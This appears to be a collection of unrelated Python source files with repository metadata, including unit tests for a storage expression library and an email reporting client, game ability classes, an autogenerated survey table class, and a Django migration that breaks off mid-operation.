2021-04-13T22:47:56.000Z
|
src/test/python/test_storage/test_var.py
|
ettoreleandrotognoli/py-storage
|
d19a0ccbbb23aed818461775a9fc3cd7c5cc25fa
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from storage.var.jsonpath import JsonPath
from storage.var import Const, Keys, Vars
class TestConst(TestCase):
def test_eq_same_should_be_true(self):
predicate = Const(1) == Const(1)
self.assertTrue(predicate(None))
def test_eq_diff_should_be_false(self):
predicate = Const(1) == Const(2)
self.assertFalse(predicate(None))
def test_ne_same_should_be_false(self):
predicate = Const(1) != Const(1)
self.assertFalse(predicate(None))
def test_ne_diff_should_be_true(self):
predicate = Const(1) != Const(2)
self.assertTrue(predicate(None))
def test_gt_true(self):
predicate = Const(1) > Const(0)
self.assertTrue(predicate(None))
def test_gt_false(self):
predicate = Const(1) > Const(2)
self.assertFalse(predicate(None))
def test_gt_when_equals_should_be_false(self):
predicate = Const(2) > Const(2)
self.assertFalse(predicate(None))
def test_ge_true(self):
predicate = Const(1) >= Const(0)
self.assertTrue(predicate(None))
def test_ge_false(self):
predicate = Const(1) >= Const(2)
self.assertFalse(predicate(None))
def test_ge_when_equals_should_be_true(self):
predicate = Const(2) >= Const(2)
self.assertTrue(predicate(None))
def test_lt_true(self):
predicate = Const(0) < Const(1)
self.assertTrue(predicate(None))
def test_lt_false(self):
predicate = Const(2) < Const(1)
self.assertFalse(predicate(None))
def test_lt_when_equals_should_be_false(self):
predicate = Const(2) < Const(2)
self.assertFalse(predicate(None))
def test_le_true(self):
predicate = Const(0) <= Const(1)
self.assertTrue(predicate(None))
def test_le_false(self):
predicate = Const(2) <= Const(1)
self.assertFalse(predicate(None))
def test_le_when_equals_should_be_true(self):
predicate = Const(2) <= Const(2)
self.assertTrue(predicate(None))
def test_mul(self):
var = Const(2) * Const(3)
value = var(None)
self.assertEqual(value, 6)
def test_mul_3(self):
var = Const(2) * Const(3) * Const(4)
value = var(None)
self.assertEqual(value, 24)
def test_truediv(self):
var = Const(10) / Const(4)
value = var(None)
self.assertEqual(value, 2.5)
def test_truediv_3(self):
var = Const(10) / Const(2) / Const(2)
value = var(None)
self.assertEqual(value, 2.5)
def test_add(self):
var = Const(2) + Const(3)
value = var(None)
self.assertEqual(value, 5)
def test_add_3(self):
var = Const(2) + Const(3) + Const(5)
value = var(None)
self.assertEqual(value, 10)
def test_concat(self):
var = Const('fuu') + Const(' ') + Const('bar')
value = var(None)
self.assertEqual(value, 'fuu bar')
def test_sub(self):
var = Const(2) - Const(3)
value = var(None)
self.assertEqual(value, -1)
def test_sub_3(self):
var = Const(2) - Const(3) - Const(5)
value = var(None)
self.assertEqual(value, -6)
def test_cast_int_to_int(self):
var = Const(1).cast(int)
value = var(None)
self.assertIsInstance(value, int)
def test_cast_str_to_int(self):
var = Const('1').cast(int)
value = var(None)
self.assertIsInstance(value, int)
class TestJsonPath(TestCase):
def test_(self):
data = {
'name': 'Fuu',
'parents': ['Fuu'],
}
predicate = JsonPath.array('$.name') == JsonPath.single('$.parents')
predicate(data)
def test_with_op(self):
data = {
'name': 'Fuu',
'height': 1.8,
'weight': 75.6,
}
imc = JsonPath.single('$.weight') / JsonPath.single('$.height') ** Const(2)
self.assertEqual(imc(data), 75.6 / 1.8 ** 2)
def test_with_op_and_force_var(self):
data = {
'name': 'Fuu',
'height': 1.8,
'weight': 75.6,
}
imc = JsonPath.single('$.weight') / JsonPath.single('$.height') ** 2
self.assertEqual(imc(data), 75.6 / 1.8 ** 2)
class TestKeys(TestCase):
def test_single_key(self):
id_value = 1
get_id = Keys(('id',))
obj = {'id': id_value}
self.assertEqual(get_id(obj), id_value)
def test_double_key(self):
id_value = 1
get_id = Keys(('parent', 'id',))
obj = {'parent': {'id': id_value}}
self.assertEqual(get_id(obj), id_value)
def test_cast_int_to_int(self):
var = Keys().cast(int)
value = var(1)
self.assertIsInstance(value, int)
def test_cast_str_to_int(self):
var = Keys().cast(int)
value = var('1')
self.assertIsInstance(value, int)
def test_cast_twice(self):
var = Keys().cast(int).cast(int)
value = var('1')
self.assertIsInstance(value, int)
class TestOptimize(TestCase):
    """Tests for constant-folding of boolean and comparison expressions."""

    def test_true_or(self):
        """True | anything folds to a true constant."""
        expression = Vars.const(True) | Vars.key('any')
        self.assertTrue(Const.is_true(expression.optimize()))

    def test_or_true(self):
        """anything | True folds to a true constant."""
        expression = Vars.key('any') | Vars.const(True)
        self.assertTrue(Const.is_true(expression.optimize()))

    def test_and_false(self):
        """anything & False folds to a false constant."""
        expression = Vars.key('any') & Vars.const(False)
        self.assertTrue(Const.is_false(expression.optimize()))

    def test_false_and(self):
        """False & anything folds to a false constant."""
        expression = Vars.const(False) & Vars.key('any')
        self.assertTrue(Const.is_false(expression.optimize()))

    def test_eq_same_key(self):
        """Comparing a key variable with itself folds to true."""
        expression = Vars.key('id') == Vars.key('id')
        self.assertTrue(Const.is_true(expression.optimize()))

    def test_eq_same_keys(self):
        """Comparing identical key paths folds to true."""
        expression = Vars.keys(('parent', 'id',)) == Vars.keys(('parent', 'id',))
        self.assertTrue(Const.is_true(expression.optimize()))

    def test_eq_same_const(self):
        """Comparing equal constants folds to true."""
        expression = Vars.const('const') == Vars.const('const')
        self.assertTrue(Const.is_true(expression.optimize()))

    def test_ne_same_key(self):
        """Inequality of a key variable with itself folds to false."""
        expression = Vars.key('id') != Vars.key('id')
        self.assertTrue(Const.is_false(expression.optimize()))

    def test_ne_same_keys(self):
        """Inequality of identical key paths folds to false."""
        expression = Vars.keys(('parent', 'id',)) != Vars.keys(('parent', 'id',))
        self.assertTrue(Const.is_false(expression.optimize()))

    def test_ne_same_const(self):
        """Inequality of equal constants folds to false."""
        expression = Vars.const('const') != Vars.const('const')
        self.assertTrue(Const.is_false(expression.optimize()))
| 29.150628
| 83
| 0.593225
| 904
| 6,967
| 4.384956
| 0.094027
| 0.079465
| 0.072654
| 0.080727
| 0.850908
| 0.833502
| 0.82442
| 0.807265
| 0.719223
| 0.703078
| 0
| 0.019746
| 0.265825
| 6,967
| 238
| 84
| 29.273109
| 0.75523
| 0
| 0
| 0.423913
| 0
| 0
| 0.030286
| 0
| 0
| 0
| 0
| 0
| 0.23913
| 1
| 0.244565
| false
| 0
| 0.016304
| 0
| 0.282609
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68ceeb6172c4b33eb7f9c9fd9f6f2ad0b9d1f4d9
| 306
|
py
|
Python
|
bflib/characters/specialabilities/immunities.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/characters/specialabilities/immunities.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/characters/specialabilities/immunities.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.characters.specialabilities.base import ImmunitySpecialAbility
class CharmImmunity(ImmunitySpecialAbility):
    """Marker ability: immunity to charm effects (no extra behavior)."""
    pass
class GhoulParalysisImmunity(ImmunitySpecialAbility):
    """Marker ability: immunity to ghoul paralysis (no extra behavior)."""
    pass
class HoldImmunity(ImmunitySpecialAbility):
    """Marker ability: immunity to hold effects (no extra behavior)."""
    pass
class SleepImmunity(ImmunitySpecialAbility):
    """Marker ability: immunity to sleep effects (no extra behavior)."""
    pass
| 17
| 73
| 0.820261
| 23
| 306
| 10.913043
| 0.565217
| 0.414343
| 0.370518
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130719
| 306
| 17
| 74
| 18
| 0.943609
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.444444
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
6bccdb52ee77152f9aafdc13d7602ccc4405df43
| 275
|
py
|
Python
|
sdcdup/data/__init__.py
|
WillieMaddox/Airbus_SDC_dup
|
09be904cf3c8050086f07538f5e2954282de5d62
|
[
"MIT"
] | null | null | null |
sdcdup/data/__init__.py
|
WillieMaddox/Airbus_SDC_dup
|
09be904cf3c8050086f07538f5e2954282de5d62
|
[
"MIT"
] | null | null | null |
sdcdup/data/__init__.py
|
WillieMaddox/Airbus_SDC_dup
|
09be904cf3c8050086f07538f5e2954282de5d62
|
[
"MIT"
] | null | null | null |
from .dataset_utils import create_256_tiles
from .dataset_utils import create_dataset_from_tiles
from .dataset_utils import create_dataset_from_truth
from .dataset_utils import TrainDataset
from .dataset_utils import EvalDataset
from .dataset_utils import WrappedDataLoader
| 34.375
| 52
| 0.887273
| 38
| 275
| 6.052632
| 0.289474
| 0.286957
| 0.417391
| 0.573913
| 0.504348
| 0.382609
| 0.382609
| 0.382609
| 0
| 0
| 0
| 0.012
| 0.090909
| 275
| 7
| 53
| 39.285714
| 0.908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6beada73fda3dc445472c870d5058e601e144152
| 8,516
|
py
|
Python
|
tests/reporting_test.py
|
aluc-nd/EmmaPython
|
7368b42ba7b4f1a3eff9fc8dc626551311b1e8de
|
[
"MIT"
] | 10
|
2015-06-02T13:24:53.000Z
|
2021-07-16T15:03:45.000Z
|
tests/reporting_test.py
|
aluc-nd/EmmaPython
|
7368b42ba7b4f1a3eff9fc8dc626551311b1e8de
|
[
"MIT"
] | 11
|
2015-09-20T01:39:36.000Z
|
2021-04-14T13:06:25.000Z
|
tests/reporting_test.py
|
aluc-nd/EmmaPython
|
7368b42ba7b4f1a3eff9fc8dc626551311b1e8de
|
[
"MIT"
] | 12
|
2015-05-26T23:39:28.000Z
|
2021-03-15T07:42:48.000Z
|
import unittest
from emma.model.account import Account
from emma.enumerations import Report, DeliveryType
from emma import get_report
from tests.model import MockAdapter
class ReportingTest(unittest.TestCase):
    """Tests for emma.get_report: each report type issues the expected GET.

    Fix: the original used ``assertEquals``, a deprecated alias that was
    removed in Python 3.12; replaced with ``assertEqual``. The repeated
    assertion triple is factored into ``_assert_single_get``.
    """

    def setUp(self):
        # Every test gets a fresh account wired to the mock adapter.
        Account.default_adapter = MockAdapter
        self.account = Account(
            account_id="100",
            public_key="xxx",
            private_key="yyy")

    def _assert_single_get(self, report, expected_type, path, params):
        """Assert the report type and that exactly one GET was issued."""
        self.assertIsInstance(report, expected_type)
        self.assertEqual(self.account.adapter.called, 1)
        self.assertEqual(
            self.account.adapter.call,
            ('GET', path, params))

    def test_can_get_response_summary(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.ResponseSummary)
        self._assert_single_get(report, list, '/response', {})

    def test_can_get_response_summary2(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.ResponseSummary, params={'include_archived': True})
        self._assert_single_get(report, list, '/response', {'include_archived': True})

    def test_can_get_response_summary3(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.ResponseSummary, params={'range': "2011-04-01~2011-09-01"})
        self._assert_single_get(report, list, '/response', {'range': "2011-04-01~2011-09-01"})

    def test_can_get_response_summary_for_mailing(self):
        MockAdapter.expected = {}
        report = get_report(self.account, Report.MailingSummary, 123)
        self._assert_single_get(report, dict, '/response/123', {})

    def test_can_get_sent_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.SentList, 123)
        self._assert_single_get(report, list, '/response/123/sends', {})

    def test_can_get_in_progress_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.InProgressList, 123)
        self._assert_single_get(report, list, '/response/123/in_progress', {})

    def test_can_get_deliveries_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.DeliveredList, 123)
        self._assert_single_get(report, list, '/response/123/deliveries', {})

    def test_can_get_deliveries_list_for_mailing2(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.DeliveredList, 123, {'del_status': DeliveryType.Delivered})
        # The enumeration value is serialized to its short wire form 'd'.
        self._assert_single_get(report, list, '/response/123/deliveries', {'del_status': 'd'})

    def test_can_get_opens_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.OpenList, 123)
        self._assert_single_get(report, list, '/response/123/opens', {})

    def test_can_get_links_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.LinkList, 123)
        self._assert_single_get(report, list, '/response/123/links', {})

    def test_can_get_clicks_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.ClickList, 123)
        self._assert_single_get(report, list, '/response/123/clicks', {})

    def test_can_get_clicks_list_for_mailing2(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.ClickList, 123, {'member_id': 1024})
        self._assert_single_get(report, list, '/response/123/clicks', {'member_id': 1024})

    def test_can_get_clicks_list_for_mailing3(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.ClickList, 123, {'link_id': 1024})
        self._assert_single_get(report, list, '/response/123/clicks', {'link_id': 1024})

    def test_can_get_forwards_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.ForwardList, 123)
        self._assert_single_get(report, list, '/response/123/forwards', {})

    def test_can_get_optouts_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.OptOutList, 123)
        self._assert_single_get(report, list, '/response/123/optouts', {})

    def test_can_get_signups_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.SignUpList, 123)
        self._assert_single_get(report, list, '/response/123/signups', {})

    def test_can_get_shares_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.SharesList, 123)
        self._assert_single_get(report, list, '/response/123/shares', {})

    def test_can_get_customer_shares_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.CustomerSharesList, 123)
        self._assert_single_get(report, list, '/response/123/customer_shares', {})

    def test_can_get_customer_share_clicks_list_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.CustomerShareClicksList, 123)
        self._assert_single_get(report, list, '/response/123/customer_share_clicks', {})

    def test_can_get_customer_share_for_mailing(self):
        MockAdapter.expected = {}
        report = get_report(self.account, Report.CustomerShare, 123)
        self._assert_single_get(report, dict, '/response/123/customer_share', {})

    def test_can_get_shares_overview_for_mailing(self):
        MockAdapter.expected = []
        report = get_report(self.account, Report.SharesOverview, 123)
        self._assert_single_get(report, list, '/response/123/shares/overview', {})
| 41.950739
| 108
| 0.650305
| 922
| 8,516
| 5.829718
| 0.100868
| 0.133023
| 0.156279
| 0.210977
| 0.860837
| 0.845953
| 0.816186
| 0.789023
| 0.789023
| 0.789023
| 0
| 0.028171
| 0.228863
| 8,516
| 203
| 109
| 41.950739
| 0.790315
| 0
| 0
| 0.583333
| 0
| 0
| 0.075613
| 0.035224
| 0
| 0
| 0
| 0
| 0.35
| 1
| 0.122222
| false
| 0
| 0.027778
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6bf0202b46cdf1703785ebd9b3fa3f9a2c682d96
| 8,210
|
py
|
Python
|
src/vbr/tableclasses/redcap/autogenerated/other_medical_surgical_treatments_ii.py
|
a2cps/python-vbr
|
9d5d4480386d0530450d59157e0da6937320f928
|
[
"BSD-3-Clause"
] | 1
|
2021-05-26T19:08:29.000Z
|
2021-05-26T19:08:29.000Z
|
src/vbr/tableclasses/redcap/autogenerated/other_medical_surgical_treatments_ii.py
|
a2cps/python-vbr
|
9d5d4480386d0530450d59157e0da6937320f928
|
[
"BSD-3-Clause"
] | 7
|
2021-05-04T13:12:39.000Z
|
2022-03-09T21:04:33.000Z
|
src/vbr/tableclasses/redcap/autogenerated/other_medical_surgical_treatments_ii.py
|
a2cps/python-vbr
|
9d5d4480386d0530450d59157e0da6937320f928
|
[
"BSD-3-Clause"
] | 2
|
2021-04-20T14:46:52.000Z
|
2021-06-07T20:28:28.000Z
|
"""Autogenerated 2021-11-16T11:37:36.434999 by redcap_classfiles.py
"""
from ....pgrest import *
from ...constants import Constants
from ..rcconstants import REDCapConstants
from ..rcaptable import RcapTable
__all__ = ["RcapOtherMedicalSurgicalTreatmentsIi"]
class RcapOtherMedicalSurgicalTreatmentsIi(RcapTable):
    """Other Medical Surgical Treatments Ii"""

    # NOTE: autogenerated from the REDCap data dictionary — do not edit field
    # names by hand; regenerate with redcap_classfiles.py instead.
    # Convention (from the generator output visible here): radio/checkbox
    # fields map to nullable Boolean columns, free-text fields to nullable
    # String columns; each column is preceded by the source field's prompt,
    # REDCap field type, and choice list.
    __redcap_form_name = "other_medical_surgical_treatments_ii"
    # Surrogate primary key for this form's rows.
    other_medical_surgical_treatments_ii_id = Constants.SERIAL_PRIMARY_KEY_COLUMN
    # REDCap form-completion status; FK into the shared status table.
    other_medical_surgical_treatments_ii_complete = Column(
        Integer, ForeignKey("status.status_id")
    )
    # Ignored multiline Field Name in Data Dictionary
    # Field Type: text
    # Choices: N/A
    oms1timeframe = Column(String, nullable=True, comments=None)
    # Did you receive any Chemotherapy / Immunotherapy for cancer i...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1chemoyn = Column(Boolean, nullable=True, comments=None)
    # Did you receive any Radiation Therapy for cancer in the past ...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1radtxyn = Column(Boolean, nullable=True, comments=None)
    # In the past [oms1timeframe], have you had any additional sign...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1surgyn = Column(Boolean, nullable=True, comments=None)
    # 3.1 Related to my original knee surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1surgrel = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Knee manipulation
    oms1relmanipultn = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Infection at surgical site
    oms1relinfection = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Revision of knee replacement
    oms1relrevision = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Other
    oms1relother = Column(Boolean, nullable=True, comments=None)
    # Other specify
    # Field Type: text
    # Choices: N/A
    oms1relothertxt = Column(String, nullable=True, comments=None)
    # 3.2 Unrelated to my original knee surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1surgunr = Column(Boolean, nullable=True, comments=None)
    # Choose all that apply
    # Field Type: checkbox
    # Choices: 1, Surgery on the other knee
    oms1unrotherknee = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Surgery on another region
    oms1unrsurgother = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Other
    oms1unrother = Column(Boolean, nullable=True, comments=None)
    # Other specify
    # Field Type: text
    # Choices: N/A
    oms1unrothertxt = Column(String, nullable=True, comments=None)
    # In the past [oms1timeframe], have you had any non-scheduled v...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1visityn = Column(Boolean, nullable=True, comments=None)
    # 4.1. Related to my original knee surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1relvisit = Column(Boolean, nullable=True, comments=None)
    # Choose all that apply
    # Field Type: checkbox
    # Choices: 1, Emergency room / Urgent care clinic visit
    oms1relvisited = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Physician office visit
    oms1relvisitoffice = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Other
    oms1relvisitother = Column(Boolean, nullable=True, comments=None)
    # Other specify
    # Field Type: text
    # Choices: N/A
    oms1relvisitothertxt = Column(String, nullable=True, comments=None)
    # 4.2 Unrelated to my original knee surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms1unrvisit = Column(Boolean, nullable=True, comments=None)
    # Choose all that apply
    # Field Type: checkbox
    # Choices: 1, Emergency room / Urgent care clinic visit
    oms1unrvisited = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Physician office visit
    oms1unrvisitoffice = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Other
    oms1unrvisitother = Column(Boolean, nullable=True, comments=None)
    # Other specify
    # Field Type: text
    # Choices: N/A
    oms1unrvisitothertxt = Column(String, nullable=True, comments=None)
    # Ignored multiline Field Name in Data Dictionary
    # Field Type: text
    # Choices: N/A
    oms2timeframe = Column(String, nullable=True, comments=None)
    # Did you receive any Chemotherapy / Immunotherapy for cancer i...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2chemoyn = Column(Boolean, nullable=True, comments=None)
    # Field Name was empty in Data Dictionary
    # Field Type: checkbox
    # Choices: 1, a. For the cancer associated with your thoracic surgery
    oms2chemosame = Column(Boolean, nullable=True, comments=None)
    # Field Name was empty in Data Dictionary
    # Field Type: checkbox
    # Choices: 1, b. For a different cancer
    oms2chemodiff = Column(Boolean, nullable=True, comments=None)
    # Did you receive any Radiation Therapy for cancer in the past ...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2radtxyn = Column(Boolean, nullable=True, comments=None)
    # Field Name was empty in Data Dictionary
    # Field Type: checkbox
    # Choices: 1, a. For the cancer associated with your thoracic surgery
    oms2radtxsame = Column(Boolean, nullable=True, comments=None)
    # Field Name was empty in Data Dictionary
    # Field Type: checkbox
    # Choices: 1, b. For a different cancer
    oms2radtxdiff = Column(Boolean, nullable=True, comments=None)
    # In the past [oms2timeframe], have you had any additional sign...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2surgyn = Column(Boolean, nullable=True, comments=None)
    # 3.1 Yes, related to my original chest surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2surgrel = Column(Boolean, nullable=True, comments=None)
    # 3.2 Yes, but unrelated to my original chest surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2surgunr = Column(Boolean, nullable=True, comments=None)
    # In the past [oms2timeframe], have you had any non-scheduled v...
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2visityn = Column(Boolean, nullable=True, comments=None)
    # 4.1. Yes, related to my original chest surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2relvisit = Column(Boolean, nullable=True, comments=None)
    # Choose all that apply
    # Field Type: checkbox
    # Choices: 1, Emergency room / Urgent care clinic visit
    oms2relvisited = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Physician office visit
    oms2relvisitoffice = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Other
    oms2relvisitother = Column(Boolean, nullable=True, comments=None)
    # Other specify
    # Field Type: text
    # Choices: N/A
    oms2relvisitothertxt = Column(String, nullable=True, comments=None)
    # 4.2 Yes, but unrelated to my original chest surgery
    # Field Type: radio
    # Choices: 1, Yes | 0, No
    oms2unrvisit = Column(Boolean, nullable=True, comments=None)
    # Choose all that apply
    # Field Type: checkbox
    # Choices: 1, Emergency room / Urgent care clinic visit
    oms2unrvisited = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Physician office visit
    oms2unrvisitoffice = Column(Boolean, nullable=True, comments=None)
    #
    # Field Type: checkbox
    # Choices: 1, Other
    oms2unrvisitother = Column(Boolean, nullable=True, comments=None)
    # Other specify
    # Field Type: text
    # Choices: N/A
    oms2unrvisitothertxt = Column(String, nullable=True, comments=None)
| 39.282297
| 81
| 0.68648
| 1,002
| 8,210
| 5.597804
| 0.168663
| 0.075415
| 0.167588
| 0.201105
| 0.804421
| 0.781601
| 0.760029
| 0.750045
| 0.709752
| 0.707434
| 0
| 0.022212
| 0.221315
| 8,210
| 208
| 82
| 39.471154
| 0.855154
| 0.449574
| 0
| 0
| 1
| 0
| 0.020151
| 0.016487
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.068966
| 0
| 0.948276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
6bffcc394be813a4e3004c1e308d8bdd079edcc9
| 81
|
py
|
Python
|
assign_stmt.py
|
duduscript/pl0-compiler-ply-
|
75a70fae38ab0fd5393f69518a2736b4365173ab
|
[
"MIT"
] | 7
|
2017-11-10T14:49:57.000Z
|
2021-07-20T12:34:32.000Z
|
assign_stmt.py
|
duduscript/pl0
|
75a70fae38ab0fd5393f69518a2736b4365173ab
|
[
"MIT"
] | null | null | null |
assign_stmt.py
|
duduscript/pl0
|
75a70fae38ab0fd5393f69518a2736b4365173ab
|
[
"MIT"
] | 2
|
2018-11-20T23:50:38.000Z
|
2021-11-14T19:23:57.000Z
|
def assign_left(ast):
    """Return the left-hand operand (index 1) of an assignment AST node."""
    lhs = ast[1]
    return lhs
def assign_right(ast):
    """Return the right-hand operand (index 2) of an assignment AST node."""
    rhs = ast[2]
    return rhs
| 16.2
| 22
| 0.679012
| 14
| 81
| 3.785714
| 0.571429
| 0.339623
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030769
| 0.197531
| 81
| 5
| 23
| 16.2
| 0.784615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d441d7f6b4f4d6775cd63bc26dea6491020be7aa
| 11,943
|
py
|
Python
|
Events/migrations/0008_auto_20181019_0242.py
|
prkhrv/Ebullience-2k18
|
0799a81239d1c1b1b6f8d49eb733f44fc22ff237
|
[
"MIT"
] | null | null | null |
Events/migrations/0008_auto_20181019_0242.py
|
prkhrv/Ebullience-2k18
|
0799a81239d1c1b1b6f8d49eb733f44fc22ff237
|
[
"MIT"
] | null | null | null |
Events/migrations/0008_auto_20181019_0242.py
|
prkhrv/Ebullience-2k18
|
0799a81239d1c1b1b6f8d49eb733f44fc22ff237
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.1 on 2018-10-18 21:12
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the Events app.

    Drops team/member fields from justaminute, posterandpresentation and
    postermaking, and normalizes event_id/event_name defaults and the
    member_N columns across all event models.

    NOTE: generated by Django (see header comment); operation literals are
    load-bearing — do not edit values by hand, create a new migration.
    """

    dependencies = [
        ('Events', '0007_auto_20181019_0045'),
    ]

    operations = [
        # Field removals: these models no longer track members/team names.
        migrations.RemoveField(
            model_name='justaminute',
            name='member_1',
        ),
        migrations.RemoveField(
            model_name='justaminute',
            name='number_of_members',
        ),
        migrations.RemoveField(
            model_name='justaminute',
            name='team_name',
        ),
        migrations.RemoveField(
            model_name='posterandpresentation',
            name='member_1',
        ),
        migrations.RemoveField(
            model_name='posterandpresentation',
            name='number_of_members',
        ),
        migrations.RemoveField(
            model_name='posterandpresentation',
            name='team_name',
        ),
        migrations.RemoveField(
            model_name='postermaking',
            name='member_3',
        ),
        migrations.RemoveField(
            model_name='postermaking',
            name='member_4',
        ),
        # Field alterations: per-model event_id/event_name defaults and
        # optional (blank, default '') member_N CharFields.
        migrations.AlterField(
            model_name='codewar',
            name='event_id',
            field=models.CharField(default='CSE01', max_length=5),
        ),
        migrations.AlterField(
            model_name='codewar',
            name='event_name',
            field=models.CharField(default='CODE WAR', max_length=20),
        ),
        migrations.AlterField(
            model_name='codewar',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='codewar',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='cosmetic',
            name='event_id',
            field=models.CharField(default='Bph02', max_length=5),
        ),
        migrations.AlterField(
            model_name='cosmetic',
            name='event_name',
            field=models.CharField(default='COSMETICS', max_length=20),
        ),
        migrations.AlterField(
            model_name='guessthebond',
